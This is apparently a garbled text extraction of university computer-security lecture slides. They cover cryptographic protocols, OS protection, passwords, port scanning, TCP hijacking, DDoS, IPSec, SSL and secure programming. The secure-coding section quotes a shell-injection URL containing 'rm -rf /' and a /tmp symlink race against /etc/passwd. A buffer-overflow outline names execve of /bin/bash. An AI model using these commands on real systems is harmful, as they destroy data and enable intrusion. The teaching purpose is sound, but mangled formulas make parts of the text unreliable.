Look at [Sta99, pg. 229] for why we go from the rst equality which is Security Protocols p.205 mod (p 1) to the second equality which is mod p. Its because p 1 = (p).
Digital Signatures With Public Key Encryption (El Gamal). . .
For forgery, Eve needs to compute s for message m s.t. the verication eqn m = r r s (mod p)
is satised. Lets say she randomly chooses r = k . Then m s = logr r So, she must be able to compute discrete logs for base k . If she chooses r = k of small order, then its unclear whether DL(s) would exist for it.
Digital Sig without Encryption

Use a strong hash function and a trusted third party. S uses a hash function fs (only S and A know it) and R uses fr (only R and A know it). Both share these functions with the arbiter A. S said M S A : (M, fs (M )).
e
A R : ( M , S, fs (M ),
e
fr (M, S ) A says that S said M
).
e: Evidence in case of future dispute.
Key Escrow
Provide strong security for communications while simultaneously allowing authorized government access to particular communications for law enforcement and national security purposes [DS94]. The EES uses SKIPJACK (64-bit block, 80-bit key) and a Law Enforcement Access Field (128-bit LEAF) transmitted with every message. Each Clipper chip has an 80-bit Device Unique key (KU ) and an 80-bit common Family Key (KF ). Key Exchange method unspecied. A session key KS is somehow generated.
Key Escrow. . .
Encryption could be used to conceal criminal and terrorist activities. By rendering communications immune from lawful interception, encryption threatens law enforcement and public safety. Special tamper-resistant hardware encryption device (Clipper and a Key Escrow System (KES).
Key Escrow. . .
The LEAF and IV are transmitted for synchronization and LEAF validation. Infeasible to deploy the system without transmitting a valid LEAF [Bla94]. Session key (KS ) is encrypted with the device KU . Unit id identies KU . The whole LEAF is encrypted under KF . The receiving chip is unable to extract KS from the LEAF.
LEAF = EKU (KS ) (80b) unit id (32b) E K F (. . . . . . ) cksum (16b)
Mental Poker
A B : EKA (C1 ) . . . EKA (C52 ). Ci = Jack of Spades. B chooses ve and sends to A: EKB (EKA (Ci )), . . . EKB (EKA (Cm )). A unlocks the ve that B has chosen [DKA (EKB (EKA (Ci ))), . . . , DKA (EKB (EKA (Cm )))] to yield [EKB (Ci ), . . . , EKB (Cm )] and sends them back to B . B can now get Ci . . . Cm .
Mental Poker. . .
To realize this scheme, one can use (Ci )
1
= Ci
Michael Goodrich has a written description of mental poker here.
Who will pay for dinner? Flipping a Coin.
If its heads, Pete will pay, if its tails, Nancy pays. So Pete ips a coin in his ofce and tells Nancy the result over the phone! Pete offers Nancy a choice of two. Nancy picks one but blinds it. She is committed to her
choice when she sends her selection to Pete.
Pete selects one of the above two blinded choices. Toss outcome depends on whether both made the same or different selections.
Pete is committed to his choice when he sends his selection to Nancy.
Who will pay for dinner?. . .

Pete selects two public key pairs: (Ei , Di ), (Ej , Dj ). Nancy chooses KN to a symmetric algorithm S known to both. P N : (Ei , Ej ). N P : Eh (KN ) picked at random, h = i | j . P N : sends M = EKP (Pete will pay). P guesses h and retrieves KP = Dh (Eh (KN )). If Nancy can read DKN (M ), Pete pays, otherwise Nancy pays.
Coin Flipping using Quadratic Residues
From [Sch97, Section 19.3]. A selects two large primes and computes n = p q . A sends n to B . [For p, q 3 (mod 4) theres a
deterministic method to nd square roots.]
B picks a random x < n and computes z = x2 mod n. B sends z to A. A computes the four square roots of z , x and y . A sends one of these four values, say , to B .
Consider the pair (a, b), a = x mod p, b = x mod q . By CRT, (a, b), (a, b), (a, b), (a, b) are square roots of z .
B veries that 2 = x2 mod n. If p = x, A wins, otherwise B wins.
Coin Flipping using Quadratic Residues. . .
If B says hes won why should A believe him? Because B can now factor n with knowledge of and x. Because GCD( + x, n) = {p | q } If 2 x2 mod n, then n | (2 x2 ). If n | ( x)( + x) then for = x, p divides one of ( x) or ( + x) and q divides the other.
Chaums Blind Signature
Dining CryptographersA Flavor
Zero KnowledgeA Flavor

Use Nasirs slides (nasir-zk.ppt). [KPS02, Section 6.8] also has a treatment of ZK.
Bit Commitment
Adapted from [TW02, Section 7.3]. Alice wants to make a private statement that once made, cannot be changed. If computing discrete logs is hard, then Alice can commit a message m by making public c = m , where is a generator of Zp . The commitment c can be later veried because m c is a 1 : 1 onto operation.
Winnowing & Chafng
How to leak a secret?
Operating System Security
Protection in General Purpose OS

Adapted from [P96, Chapter 6]. Why protect the OS? Operating Systems support multiprogramming so theyve developed ways to protect the computation of one user from inadvertent or malicious interference from another.
OS Security p.224
Protection in General Purpose OS. . .

Executives. Provided linkers and loaders Provided linkers and loaders for relocation. Provided easy access to compilers, assemblers. Provided automatic loading of subprograms from libraries. Monitors. Provides scheduling, sharing, and parallel use of resourcesmemory, I/O devices, sharable programs and data. Oversaw all computing.
OS Security p.225
Security Methods of OSes

The basis of protection is separation. Physical Separation. Poor resource utilization. Temporal Separation. Poor resource utilization. Logical Separation. Cryptographic Separation.
OS Security p.226
Security Methods of OSes. . .

Separation is only half the answer. The other half is controlled sharing. All or Nothing. Access control on objects. Capabilities. Partial use of objects. E.g., the ability to read but not print as in Adobe reader. Collect statistics from a database but not the actual records. What is the granularity of sharing?
OS Security p.227
Protecting Memory
Using a xed fence with non-relocatable programs that know the fence value at compile time. Protection in only one direction. You can shoot yourself in the foot. Cannot sub partition programs into ner granularity of protection.
OS Security p.228
Protecting Memory. . .
Using variable sized fences with programs compiled starting at address 0. Programs not relocated, rather indirection used with the fence value stored in a register. Provides relocation and protection at the same time.
OS Security p.229
Protecting Memory. . .
Base bounds registers. Provide both lower and upper bounds. Change it for every program at context switch. Use additional base bounds registers for ner granularity partitionsay code and data.
OS Security p.230
Protecting MemorySegmentation
Addresses are of the form seg #, offset . Segments can be separately relocated and protected. Each process would normally have its own segment table for address translation. Processes that want to share segments map them to the same segment numbers in their segment table.
OS Security p.231
Protecting MemorySegmentation. . .
Pros and Cons: Fine granularity of protection, on a per-segment basis. Can lead to fragmentation of main memory. Requires compaction. Sharing requires same segment numbers in all sharing processes because of inter segment references.
OS Security p.232
Paging
Addresses are of the form page #, offset . All pages are of the same size.
OS Security p.233
Segmentation+Paging
Break a segment into pages.
OS Security p.234
User Authentication
The process whereby a system is assured of the identity of the user involved in a protocol and that the user has actually participated. Message authentication itself provides no timeliness guarantees w.r.t. when the message was created. User authentication is a real-time process. Adapted from [Den04, Week 4].
OS Security p.235
Bases of User Authentication

Something the user knows, e.g., passwords, PINs. Something the user possesses, e.g., smart card, tokens. Something the user is (or how he behaves), known as biometrics, or the measurement of some biological property of the user, e.g., ngerprints. We are only concerned with password based user authentication here.
OS Security p.236
User Authentication. . .
Alice Bob. Concerns: Eavesdropping, Exposing secrets on server. Goal: No secrets on the server + foil eavesdropping. Methods: Passwords, One-Time Passwords, Challenge-Response protocols, Zero-Knowledge authentication.
In typical environments, authentication has to be combined with session key exchange protocol (for encryption/authentication) to foil session hijacking.
OS Security p.237
Passwords
Used to authenticate people. Have low entropy ( 25 bits).
225 = 33554432, 2558 = 17878103347812890625.
Susceptible to eavesdropping, replay to server. A B pwd1 pwd2 . . . pwdn
OS Security p.238
Passwords. . .
Never store passwords on the server. Store the password hash instead. Dont need the ability to invert. If this le is exposed, an adversary can mount a dictionary attack. for(every { compute } lookup word h(w) file. w in dictionary)
h(w) in this
OS Security p.239
Passwords. . .
Unix uses a modied DES algorithm with 12 bits of salta two-char string from the set [a-zA-Z0-9./] . It is used to perturb the algorithm in one of 4096 different ways. Usually encrypts 0 with the key 25 times. The value stored in the password le is a series of 13 printable ASCII characters (the rst two characters are the 12-bit salt itself and the remaining 11 characters encode the 64-bit encryption of 0). See crypt(3). Suppose 10M words in dictionary, 12 bit salt: then we have 10M 4K = 40G encrypted passwords. Assuming average length of 8 bytes gives 320GB . If one encryption is done in one s, the dictionary can be encrypted in 40 109 106 = 4 104 s 10 hours.
OS Security p.240
PasswordsSalting
Salt makes dictionary attack harder. An attacker must hash every word in the dictionary 212 times. Logically, it looks like Alice salta h(Pa ||salta ) Bob saltb h(Pb ||saltb ) salta is 4 bits. To verify a users password, the system tries all 24 combinations of salta . Attackers work goes up by 16. Secret Salt. Store Alice|salta |h(Pa ||salta ||salta ) .
OS Security p.241
Biometrics
OS Security p.242
One-Time Passwords
Lamport hash (S/Key) based on hash-chain [KPS02, Section 12.2]. Alice remembers a password p. Bob (server) remembers (user, n, hn (p)). A B : A (I am Alice) B A: n A B : x = hn1 (p)
OS Security p.243
One-Time Passwords. . .
Pros and Cons Can only log in a nite # of times. No mutual authentication. Small n attack. What if Alice can be tricked into revealing h50 (p).
OS Security p.244
File Protection Mechanisms

Adapted from [P96, Section 6.4]. All or Nothing Protection: Trust and ignorance. May work in systems with few users who trust each other. No convenient way of limiting le access to subset of users.
OS Security p.245
File Protection Mechanisms. . .

Discretionary Access Control
Group Protection: Need to share in a controlled way. (owner, group, world). rwxrwxrwx Dene access rights on le creation. For e.g., the open (path, mode) syscall will use (defaults & umask). A user is identied by two identiers (numbers), the user-id and the group-id. On Linux, /etc/passwd contains a record for every user (non NIS). user_name:pwd:uid:gid:comment:home_dir:login_shell root and lroot /etc/group denes groups. (newgrp) group_name:pwd:gid:uid_list
OS Security p.246
File Protection Mechanisms. . .DAC

File and Directory permissions (there are ACLs in other OSes). Sticky bit on directories. Allows removal/renaming of les that you own. /tmp is drwxrwxrwt on my machine.
Turning on sticky bits turns on mod bits 111. Extra attributes on the ext2 FS. lsattr , chattr . 1 word (include/linux/ext2_fs.h) = { A (dont update atime) a (open append only) c (compress) d (mark for dump) i (immutable) s (zero blocks on delete) S (write synchronously) u (save contents on delete) } OS Security p.247
File Protection Mechanisms. . .DAC

Quota (# of blocks/inodes), ulimit (core le size, max data segment size, max cpu time, max open les) struct rlimit rlim[RLIM_NLIMITS]; (linux/include/sched.h). Setuid. Permits a user to establish data les to which access is allowed only through specied procedures. Say, for example, the /etc/passwd le being manipulated by /usr/bin/passwd which is setuid root.
OS Security p.248
Network Security
OS Security p.249
OSI Network Protocol Stack

7 6 5 4 OSI TCP/IP Application Application Presentation Session Transport Transport Internet Data link Physical
Demuxing within a machine, in order delivery. End-to-end routing and addressing. Channel access, Framing. Bits, Encoding (Manchester), Modulation.
3 Network 2 Data link 1 Physical
Network Security p.250
Port ScanningNmap
To nd services (exploitable communication channels) running on your machine. TCP header
1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 Source port Destination port Sequence number Acknowledgement number (1 + last byte # recvd) Hdr len Reserved Code Window Checksum Urgent pointer Options if any padding DATA
CODE is 6 bits, from left to right: URG, ACK, PSH, RST, SYN, FIN.
Port scanning What ports are open on a machine? See nmap doc for details. TCP connect scanning. Can result in application-level logging. TCP SYN scanning aka stealth mode. Leads to denial of service in many OSes (half open conenctions). Could be logged. TCP FIN scanning. On *nix, this generates RST on a closed port and is ignored on open ports. Fragmentation scanning. Split TCP header (SYN) into multiple packets so intermediate lters cant lter it. UDP port scanning by received ICMP port unreachable messages. Parallelism may be limited by the hosts error limit rate.
Xmas tree scan: FIN|URG|PSH in an attempt to let the rewall pass the packet through. Network Security p.252
Remote OS detection via TCP/IP Stack Fingerprinting
Why? Many security holes dependent on OS version. Scan a network for (OS, svc) pairs and wait for next exploit. Social engineering. How? Just telnet to the machine. Telnet to the ftp port (telnet mirror.nus ftp). DNS host info record. (nslookup, set type=hinfo, www.comp.nus.edu.sg). snmpwalk.
Remote OS detection via TCP/IP Stack Fingerprinting. . . Basically, look for things that are different among OSes and write a probe for the difference. Examples: FIN scan to known open port. Windows boxes will send RST back while *nix boxes will silently discard it. BOGUS ag returned on some Linuxes. (SYN+BOGUS) returns (ACK+BOGUS). ISN sampling. Some always use the same ISN! Random increments, true random, time-dependent model,. . . Dont Fragment bit in the IP header. TCP Initial window size (during handshake or on RST packets). AIX = 16165! ACK value on RST returned on a FIN|PSH|URG sent to a closed port?
Remote OS detection via TCP/IP Stack Fingerprinting. . . ICMP error message rate. Some systems such as Linux will rate limit the returned error messages. ICMP message quoting size. How much of the offending packet is returned. Only header+64 bits returned or more or the whole packet. TOS on ICMP port unreachables. Overlapping fragments for TCP. Fragmentation handling. TCP options, which ones supported, order of return,. . .
Remote OS detection via TCP/IP Stack Fingerprinting. . . Examples of Nmap conguration T5 (DF=N%W=0%ACK=S++%Flags=AR%Ops=). SYN to a closed port. T 5 is a predened test whose response should match the spec above. T6 (DF=N%W=0%ACK=O%Flags=R%Ops=). closed port. IP header
1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 vers hlen svc type total len ident ags frag offset ttl protocol hdr checksum source ip addr dest ip addr ip options if any padding DATA
ACK to a
Passive Snifng Attacks

Can capture clear text passwords, for e.g., in telnet. Can capture cookies in HTTP trafc.
Active Attacks
Kill active TCP connections by sending RST. ARP spoong connections can be redirected through another host. See securitypronews for an exploit with EtterCap. TCP spoong with sequence number guessing. TCP connection hijacking.
ARP Spoong
Adapted from hackinthebox. A B C
If B will accept a gratuitous ARP reply, then A B : macc = maca and A C : macb = maca . Protocol ought to accept answers only for outstanding queries. In any event the answers are unauthenticated.
Morris Sr.s attack

AZ d
3. ACK 2. SY N +ACK / 1. SY N
E
E sends SYN to A with source B . A responds with SYN+ACK to B . If E can guess the ISN in 2, it can respond with ACK+DATA before B can send RST. E might use a disconnected B , prevent it from sending the RST, or prevent 2 from reaching B .
A cant tell the difference between B A and E ANetwork . Security p.260
TCP hijacking one way desynchronization
a
S
The servers window should intersect with the clients with its left edge to the right of the clients left edge.
TCP hijacking one way desynchronization. . .
Consider sliding window protocols such as TCP. Data ow direction: C S . Client proposes ISN. Server proposes window size for ow control. Server discards any data outside the window i.e., < a, or > b and sends an ACK for a. Server cannot advance window without receiving data at seq num a. In a desynchronized state, it never will. Attacker can feed data starting at a to S . When S responds with an ACK, it falls outside C s window.
TCP hijacking early attack
S C : ACKx+1 , SYN(ISN = s) X S : ACKs+1 , RST. S now thinks that C has broken the connection. But C has established its sending window to be [x, x + w]. Establish another connection between C and S . X S : SYN(ISN = a)
Break a legit connection between C and S . C S : SYN(ISN = x)
S C : ACKa+1 , SYN(ISN = s ). Ignored by C because ACK of a + 1 is outside its window of [x, x + w] and a SYN of s is probably outside of [s, s + w].
DNS based attacks

See Christoph Schubas MS thesis defense slides.
(Distributed) Denial of Service

Relatively new development.
Feb 2000 saw attacks on Yahoo, buy.com, ebay, Amazon, CNN.
One form of DDoS attack simply saturates the network.

Prevents legitimate use of resources such as Web services.
Another form exploits vulnerabilities to crash machines. Results in degradation of services on the network.
Locked up accounts.
A Simple DOS Attack

Attacker
/
Zombie
/
V ictim
Attacker uses indirection to attack a victim.
A DDOS Attack
? Z << ~ << ~~ ~ << ~ ~ << ~ << /Z M MMM <<< @@ ~? MMM << @@~~ MMM << ~~@@@ MMM < ~ ~ &/ /Z 8AV q @@ ~? q q @@~~ qq q q @ ~ q ~ @@ q q ~ ~ qq q /Z @@ @@ @@ @
Z ? ~~ ~ ~~ ~ ~ A @@ / Z @@ @@ @ Z
Distributed Denial of Service

Many more pathways utilized to attack the victim. Can involve hundreds or thousands of machines all over the Internet. Break into weakly-secured computers using well known bugs. Conceal the break-in and hide traces of subsequent activity. Install software to remote control the machine. Launch a coordinated attack on the victim.
Flooding Attacks
Smurf attack. Send ICMP ECHO to broadcast address with source address of victim. TCP SYN attack. Send SYN datagrams to victim with forged, non-existent source addresses. UDP ooding Send UDP datagrams at high volume to ports on the victim machine.
Logic Attacks
Ping of Death. Construct ICMP ECHO datagram as fragments such that the assembled datagram exceeds the 64K limit for IP datagrams. An IP datagram has a 13-bit frag offset specied in 8-byte units. Highest offset = 216 8! Problem is with IP reassembly. Land.
Send a datagram with the same source and destination address.
Defeating DDOS
Egress ltering. Stop spoofed packets from leaving your network. Stop your network from being used as an amplication site.
Disable IP directed broadcast on all systems.
Countering DOS
Simple cookies Would need to remember them.
start protocol
A
o
challenge ' really start protocol
TCP SYN cookies Particular choices of ISN. Self verifying: e.g.,

MD5(secret, time, src_ip, src_pt, dest_ip, dest_pt)
Countering DOS
Require clients to do work in order to connect [Juel99].
E.g., what 27-bit number has a SHA checksum of x?
Linux Netlter
IPSec [Sta03, Chapter 16]

IPSec is communication security provided at the network layer.
Communication protected with a session key is called a security association, a triple SPI, dest address, AH | ESP
Provides security for security-ignorant network applications.

Somewhat transparent to the application. Can be implemented as bump-in-the-wire.
Flexible enough to allow
Secure branch ofce connectivity over the Internet. Secure remote access over the Internet. Network Security p.275
IPSec. . .
We will restrict ourselves to IPv4 with IPSec in tunnel mode. Transport the original datagram in its entirety inside another one.
A Simple IPSec scenario
Some IPSec Terminology. . .SA

Security Association
One-way relationship between sender and receiver. An SA can be used with AH or ESP, but not both. It is identied at a host h by the triple SPI (32 bits, local signicance at h). IP destination address (unicast or multicast). Security protocol identier. SA related data includes seq#, anti-replay window, AH/ESP params, SA lifetime,. . .
Some IPSec Terminology. . .

Security Policy Database (SPD)
Contains entries, each if which denes a subset of IP trafc and points to an SA for that trafc. Each entry is dened by a set of IP and upper-layer protocol eld values, called selectors. A selector can specify match against src/dest addr/port, transport-layer protocol.
IP
SPD Selector <dst=137.132.0.0/16>
SAD
<AES key=0x...., MAC=HMACMD5,....>
Encrypted
Authentication Header
Provides support for data integrity and authentication.
Prevents address spoong attacks. Guards against replay attacks.
The communicating parties must share a key. Next hdr Header len Reserved SPI Sequence # Authentication data/ICV (variable)
Authentication Header. . .
Authenticates its payload + immutable parts of the outer IP header.
Must support HMAC-MD5-96 & HMAC-SHA-1-96. Mutable elds set to 0 when computing ICV. Authentication Data eld set to 0 when calculating ICV. Problem for NAT.
Header len header size in 32-bit chunks 2. Sequence number is used to recognize replayed packets.
A new SA initializes it to 0. Anti-replay does not permit recycling past 232 1. Receiver should implement a window to check for replay.
Encapsulating Security Payload

Provides condentiality of message contents and limited trafc ow condentiality. Can provide same authentication services as AH.
SPI Sequence # IV (if SA requires it) Payload data (variable)
Padding 0 255 bytes Pad length Next header Authentication data (variable/optional) Network Security p.282
Encapsulating Security Payload. . .

Next header identies payload type. Encryption IV rst part of payload (unencrypted of course). Variable padding hides real payload length. Tunnel-mode hides inner packet addresses. For encryption + authentication,
authentication applies to encrypted data. the IP header is not protected.
Some thoughts on IPSec

The ESP authenticates encrypted payload. Is there need for separate AH when ESP can provide the same functionality? Should AH authenticate IP header elds?
VPNs one way to do it

Home machine needs an address on the inside virtual interface with an inside address. Destinations on the inside routed via this interface. One tunneled ESP SA from home GW. Datagrams for inside tunneled to GW. GW de-tunnels and forwards it on the inside.
VPNs one way to do it. . .

GW address = 137.132.1.1. Home m/c public address = 218.186.1.1. Home m/c inside address = 137.132.2.1. Home m/c trying to reach 137.132.3.1.
VPN
NUS 137.132.0.0/16
home 218.186.0.0/16
137.132.1.1
218.186.1.1
137.132.3.1
137.132.2.1 Network Security p.286
Simplied SSL protocol

Consider a simplied SSL protocol exchange.
C C C C
1 S Supp cipher suites, 28B randomness r2 S Chosen cipher suite, 28B randomness S Server cert S EservP ubKey (Client selected 48B PMS) Both parties compute MS h(pms||r1 ||r2 ) Encryption & MAC keys derived from MS
Subset of SSL Messages

[Protocol, Version, Length]
ChangeCipherSpec (20)
Alert (21)
Handshake (22)
Application (23)
HelloRequest(0) CertificateRequest (13) ClientHello (1) ServerHelloDone (14) ChangeCipherSpec ServerHello (2) CertificateVerify (15) Certificate (11) ClientKeyExchange (16) ServerKeyExchange (12) Finished (20)
A basic but complete SSL protocol interaction
x ClientHello ServerHello Certicate ServerHelloDone | ClientKeyExchange } ChangeCipherSpec ~ Finished ChangeCipherSpec Finished
y z {
Client Hello
From an Ethereal trace (SSLv2).
Length (2 bytes). Client Hello (1 byte) = 0x01. Version (2 bytes) = 0x0301. SSL 3.1. Cipher Spec Length (2 bytes), say = . Session ID Length (2 bytes), probably = 0 for new connection. Challenge Length (2 bytes), say = x. Cipher specs of 3 bytes each, = /3. Challenge, x bytes.
Server Hello
Response is SSLv3. From server client. SSLV3 record layer: Handshake.
Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes)
Payload can carry multiple messages. Handshake Type (1 byte) = Server Hello (2). Length (3 bytes). Why 3? Can it be split across a record? Version (2 bytes) = 0x0301. Random time (4 bytes). Random bytes (28 bytes). Session Id Length (1 byte). Network Security p.291 Session Id (32 bytes).
Certicate S C
Response is SSLv3.1. From server client. SSLV3 record layer: Handshake.

Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes) Payload. Handshake Type (1 byte) = Certicate (11). Length (3 bytes). Why 3? Can it be split across a record? No Version eld. Certicates length of the whole blob (3 bytes). Certicate chain
Server Hello Done

Response is SSLv3.1. From server client. SSLV3 record layer: Server Hello.
Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes) Payload. Handshake Type (1 byte) = Server Hello Done (14). Length (3 bytes), value = 0
Client Key Exchange

From client server. SSLV3.1 record layer type: Handshake.
Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes), say = x. Payload is the Client Key Exchange message. Type (1 byte) = Client Key Exchange (16). No Version eld. Length (3 bytes), say = y . y bytes of data blob, x = y + 4.
Change Cipher Spec C S

From client server. SSLV3.1 record layer type: Change Cipher Spec.
Type (1 byte) = Change Cipher Spec (20). Version (2 bytes) = 0x0301. Length (2 bytes), value = 1. Payload is 1 byte of value 1.
Client Encrypted Handshake Finished
From client server. SSLV3.1 record layer type: Handshake.

Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes), say = x. x bytes of encrypted data blob.
Change Cipher Spec

From server client. SSLV3.1 record layer type: Change Cipher Spec.
Type (1 byte) = Change Cipher Spec (20). Version (2 bytes) = 0x0301. Length (2 bytes), value = 1. Payload is 1 byte of value 1.
Server Encrypted Handshake Finished
From server client. SSLV3.1 record layer type: Handshake.

Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes), say = x. x bytes of encrypted data blob.
Application data
SSLV3.1 record layer: Application data.
Type (1 byte) = Application data (23). Version (2 bytes) = 0x0301. Length (2 bytes), say = x. Payload is encrypted data of x bytes.
Certicates
A certicate binds a name to a key. From [Tho00, Appendix A.1]:
Version Serial Number Algorithm Id Issuer Validity Subject Subjects Public Key Issuer Unique Id (optional) Subject Unique Id (optional) Extensions (optional) Signature
Certicate Authority
Root CA
Everyone has roots certicate and trusts it. Trust ows from root leaf. Is trust transitive?
CA1
CA2
CA3
Getting a persons public key in order to communicate with them, say scott.mcnealy@sun.com? Use IBE.
JSSE SSLContext
KeyManager[..] I TrustManager[..]
tt t tt t tt t tt t tt t tt t t z t II II II II II II II II II I$
SSLContext
javax.net.ssl.SSLContext. Used to create both client and server SSL sockets. SSLContext.getSocketFactory().createSocket( url , 443 ); SSLContext.getServerSocketFactory();
JSSE SSLContext. . .
SSLContext sc = SSLContext.getInstance(TLS); sc.init(KeyManager[], TrustManager[], SecureRandom); KeyManagers are responsible for managing key material. For e.g., SunX509. TrustManagers manage the trust material that is used when making trust decisions. For e.g., SunX509.
JSSE Keystore
Represents a storage facility for cryptographic keys and certicates. Can be thought of as a hash table indexed by alias (a String), with the value being A [private_key, certicate_chain] tuple of type KeyStore.PrivateKeyEntry. A trusted certicate of type KeyStore.TrustedCerticateEntry. Others. . .
Secure Shell Tunneling (Reverse)

How to forward remote X-clients (on host R) to the local X-server (L) over a protected SSH tunnel? Why? Firewall protecting L may only permit outbound connections to remote hosts at port 22. Have remote X-clients believe the X server is running at port 6001 [DISPLAY=localhost:1.0]. Tunnel TCP connections made to R : 6001 L : 6000. In /.ssh/config:

Or, use ssh -R 6001:localhost:6000 < R> . Tunnel set up when you ssh from L R.

Secure Shell Tunneling (Forward)

How to forward local clients (on host L) to services running on hosts reachable from R, say to R . Say remote service runs at port p. Tunnel TCP connections made to L : p R : p. In /.ssh/config:

Tunnel set up when you ssh from L R.
Tunnels in Tandem
Tunnel X clients running on C to display on A. x RemoteForward 17439 localhost:6000. y RemoteForward 6001 localhost:17439. On C : typeset -x DISPLAY=localhost:1.0. x y
Vtun virtual tunnels

For more information, see here. Uses the tun driver. Opening /dev/net/tun creates a new virtual networking interface. Writing raw IP datagrams to FD will be sent up the IP stack on localhost. Reading from FD will retrieve every datagram exiting the virtual networking interface.
Vtun virtual tunnels

10.0.0.1 virtual interface 137.132/16 10.0.0.2 virtual interface NAT
real interface 0.0.0.0/0
real interface 137.132/16
Netlter (hooks)
See the Netlter howto. NF_IP_PRE_ROUTING [ip_input.c:ip_rcv()], NF_IP_LOCAL_IN [ip_input.c:ip_local_deliver], NF_IP_FORWARD [ip_forward.c:ip_forward()], NF_IP_LOCAL_OUT [ip_output.c:(various functions)], and NF_IP_POST_ROUTING [ip_output.c:(various functions)]. Attach packet ltering rules at NF_IP_LOCAL_IN (for input) & NF_IP_LOCAL_OUT (for output).
Netlter callbacks
outside
/ P RE
/ rt_lkup
/ FWD
/ O
rt_lkup
/ P OST
local_in
localO _out f rom box
into box
Safe Programming
Borrowed heavily from a talk by Alec Muffett and Casper Dik in 1998
General Remarks
Security is not an add-on. Adding cryptography to a house of cards doesnt make it a castle. Security is orthogonal to functionality. Functional testing will not usually reveal security problems. Better coding is essential. Secure programming is a mindset. Detect the unexpected. Abort sensibly if surprised. Test all return codes. Never trust your input. Random numbers how random are they?
Safe Programming p.313
On Commenting Code
Comment complicated blocks with non obvious side effects. Document why certain privileges and permissions are needed. Why setuid root, why setgid sys? Why owned by bin, writable by group mail?
On Trusting Input
Command line arguments? Environment variables? File descriptor table? Umask? Resource limits? Signal state (mask, pending)? CWD? Taint perl.
Bounds Checking
Never use gets, strcat, strcpy, sprintf etc. Be aware of how these functions treat NUL.
Using Randomness
Be careful when generating session keys, nonces, etc. whose impact on security is substantial.
Avoiding Race Conditons

TOCTOU Time-Of-Check-to-Time-Of-Use.

See man 2 access. Check-and-use are not atomic. Any consecutive references to a le by name. find /tmp -mtime +7 -print | xargs rm -f. Attacker
creates /tmp/x/etc/passwd and quickly renames /tmp/x to /tmp/x2 and sumlinks /tmp/x to /.
Using powerful interpreters

Dont invoke the shell. No popen, system, exec*p.

What if the url was something like http://www./bin/rm -rf / 2> /dev/nullcomp...?

Tamper Resistance A Cautionary Note
Tamper Resistance The Old Fashioned Way. Make code books heavy. Print sensitive information in water soluble ink, on cellulose nitrate for rapid destruction. Susceptible to surprise and sudden capture.
Levels of Tamper Resistance

Against Clever Outsiders. Intelligent but insufcient system knowledge. Take advantage of existing weakness. Against Knowledgeable Insiders. Have specialized knowledge and experience. Highly sophisticated tools and instruments. Against Funded Organizations. Can assemble team of experts. Sophisticated attacks using the most advanced analysis tools.
Smartcards and Microcontrollers

Assume that attackers can obtain several examples of the target equipment. Prevent programming by covering the programming voltage contact on the card with tape. Unusual voltages and temperatures can affect EEPROM write operations. Internal memory may be read out when voltage is low. On board random # generators may generate low entropy sequences when the voltage is lowered slightly. Circuitry to prevent single stepping attacks may cause lots of false positives.
Power and clock transients can be used to affect decoding and execution of instructions. E.g., reveal extra bytes (perhaps keys). Safe Programming p.322
Smartcards and Microcontrollers

1 b = answer_address 2 a = answer_length 3 if(a == 0) goto 8 4 transmit(*b) 5 b = b+1 6 a = a-1 7 goto 3 8 ...
Administrivia
April 1, 2005
April 16th will be considered as extra class period.
Security problems with DNS. Rats and writing safer code. SSH tunneling. Vtuns. IPtables. Primes is in P. Steganography (Nasirs slides). Tamper resistance of Smart Cards. Pushback (for Congestion Control).
Administrivia p.325
References
A complete list of references can be found here.
References
[Bar02] [BCK96a] Thomas H. Barr. Invitation to Cryptology. Prentice Hall, 2002. Mihir Bellare, Ran Canetti, and Hugo Krawczyk. Keying hash functions for message authentication. Proceedings of Crypto, 1996. An expanded version is available at http://www-cse.ucsd.edu/users/mihir. Mihir Bellare, Ran Canetti, and Hugo Krawczyk. Message authentication using hash functionsthe hmac construction. Technical report, RSA Laboratories, 1996. Matt Blaze. Protocol failure in the escrowed encryption standard. Proceedings of Second ACM Conference on Computer and Communications Security, November 1994.
[BCK96b]
[Bla94]
[BM92]
Steven M. Bellovin and Michael Merritt. Encrypted Key Exchange: Password-Based Protocols Secure Against Dictionary Attacks. In Proceedings of the Symposium on Research in Security and Privacy, Oakland, CA,Administrivia May p.326

Wade Trappe

Uploaded by

Copyright:

Available Formats

You might also like

Wade Trappe

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Wade Trappe

Uploaded by

Copyright:

Available Formats

Lecture Slides

CS4236 Principles & Practice of Computer Security http://www.comp.nus.edu.sg/~cs4236/

Lecture Slides p.1

Ofce Hours: Tue 5-6pm in S15#04-08. Grading policy:

CS4236 intro p.2

CS4236 intro p.3

Is Computer Security necessary?

Overview of Computer Security p.4

Examples of Security Problems

Overview of Computer Security p.5

Examples of Denial of Service

YAHOO WEB SERVER

TCP SYN TCP SYN+ACK

TARGET (allocates resources)

Overview of Computer Security p.6

Traditional elements of Information Security - goals in [P96]

Condentiality [they want your data]. Assets of a

Breach: interception. Integrity. Assets can be modied only by authorized parties.

Overview of Computer Security p.7

Why is security hard?

Overview of Computer Security p.8

Design Principles for Secure Systems

Overview of Computer Security p.9

Design Principles for Secure Systems. . .

Overview of Computer Security p.10

Design Principles for Secure Systems. . .

some of which purport to be secure may not result in a secure system.

Overview of Computer Security p.11

Buffer Overow: Attack of the Decade

Overview of Computer Security p.12

Buffer Overow Mechanism

Overview of Computer Security p.13

Injecting code on Activation Record

Overview of Computer Security p.14

Injecting code on Activation Record

Higher address frame ptr ret addr str

strcpy overflows ret addr

Overview of Computer Security p.15

Injecting code on Activation Record

The basic problem is that strcpy doesnt do range checking.

Overview of Computer Security p.16

Stack Smashing Attack

frame ptr ret addr (irrelevant)

P: execve(/bin/bash, char **argv, char **envp) properly constructed!

See the Aleph One article for step-by-step description.

Overview of Computer Security p.17

Constructing call to execve

Overview of Computer Security p.18

Constructing call to execve. . .

